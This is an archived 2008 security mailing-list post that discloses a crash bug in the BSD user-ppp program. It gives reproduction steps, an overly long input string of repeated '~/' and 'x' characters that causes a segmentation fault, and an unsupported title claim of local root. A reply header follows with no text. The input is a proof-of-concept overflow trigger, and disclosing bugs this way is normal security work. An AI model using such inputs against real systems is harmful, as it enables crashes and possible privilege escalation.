Vuln Dev
*BSD user-ppp local root (when conditions permit) Feb 29 2008 04:39PM
sipherr gmail com (1 replies)
/***********************************************************************
************/

/*** pppx.conf - Point to Point Protocol (a.k.a. user-ppp) exploit by sipher ***/

/*** 2003 / 12 /23 - PRIVATE CODE ***/

/*** Program terminated with signal 11, Segmentation fault. ***/

/*** #0 0xbeefdead in ?? () ***/

/***********************************************************************
************/

I just tested this on FreeBSD 6.3. This bug was discovered on NetBSD. It also works on OpenBSD (unconfirmed on 4.2)

Steps to reproduce:

1. Run ppp

2. type the following (or atleat some variation of)

~/~/~/~/~/~/~/~/~/~/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxx

This will produce a segmentation violation (Core dumped).

Discovered by: sipher

Shouts: princess^pookie,spithash,burnout,#codemasters,#hackers@dalnet

[ reply ]
Re: *BSD user-ppp local root (when conditions permit) Mar 01 2008 11:06PM
Eygene Ryabinkin (rea-sec codelabs ru)


 

Privacy Statement
Copyright 2010, SecurityFocus